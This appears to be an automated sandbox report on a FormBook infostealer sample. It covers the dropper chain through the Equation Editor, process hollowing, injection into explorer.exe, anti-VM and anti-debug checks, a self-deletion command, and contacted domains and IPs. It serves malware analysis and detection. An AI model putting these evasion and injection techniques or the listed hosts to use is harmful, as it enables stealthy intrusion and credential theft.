Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041D55C push eax; ret 5_2_0041D562
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0041ED7F push dword ptr [F1875581h]; ret 5_2_0041F01B
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CBDFA1 push ecx; ret 5_2_00CBDFB4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_023FDFA1 push ecx; ret 7_2_023FDFB4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000B716F push ebx; ret 7_2_000B718F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000AE288 push ebp; ret 7_2_000AE289
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BD4A5 push eax; ret 7_2_000BD4F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BD4FB push eax; ret 7_2_000BD562
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BD4F2 push eax; ret 7_2_000BD4F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BD55C push eax; ret 7_2_000BD562
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_000BED7F push dword ptr [F1875581h]; ret 7_2_000BF01B
Source: initial sample Static PE information: section name: .text entropy: 7.04755215007

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\harshmanzx[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xEA
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: hasmenhtk721.exe PID: 2308, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000000A9904 second address: 00000000000A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 00000000000A9B6E second address: 00000000000A9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2652 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe TID: 760 Thread sleep time: -34097s >= -30000s
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe TID: 2560 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2836 Thread sleep time: -40000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00409AA0 rdtsc 5_2_00409AA0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Thread delayed: delay time: 34097
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000006.00000000.468484505.0000000008438000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000k
Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.449394669.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.468484505.0000000008438000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0N
Source: explorer.exe, 00000006.00000000.465258321.00000000045D4000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: hasmenhtk721.exe, 00000004.00000002.437314183.0000000002221000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.524779925.000000000457A000.00000004.00000001.sdmp Binary or memory string: idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00409AA0 rdtsc 5_2_00409AA0
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CA00EA mov eax, dword ptr fs:[00000030h] 5_2_00CA00EA
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CA0080 mov ecx, dword ptr fs:[00000030h] 5_2_00CA0080
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_00CC26F8 mov eax, dword ptr fs:[00000030h] 5_2_00CC26F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_024026F8 mov eax, dword ptr fs:[00000030h] 7_2_024026F8
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Code function: 5_2_0040ACE0 LdrLoadDll, 5_2_0040ACE0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.ceasa.club
Source: C:\Windows\explorer.exe Network Connect: 166.62.10.138 80
Source: C:\Windows\explorer.exe Domain query: www.eastwestasia-thailand.com
Source: C:\Windows\explorer.exe Domain query: www.alzayantourism.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.215 80
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 70000
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Memory written: C:\Users\user\AppData\Roaming\hasmenhtk721.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 1764
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Process created: C:\Users\user\AppData\Roaming\hasmenhtk721.exe C:\Users\user\AppData\Roaming\hasmenhtk721.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\hasmenhtk721.exe'
Source: explorer.exe, 00000006.00000000.460524294.0000000000750000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688441808.0000000000CF0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.460037596.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.460524294.0000000000750000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688441808.0000000000CF0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.460524294.0000000000750000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.688441808.0000000000CF0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Queries volume information: C:\Users\user\AppData\Roaming\hasmenhtk721.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000006.00000000.459016681.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.477117043.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687693280.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687716035.00000000001E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY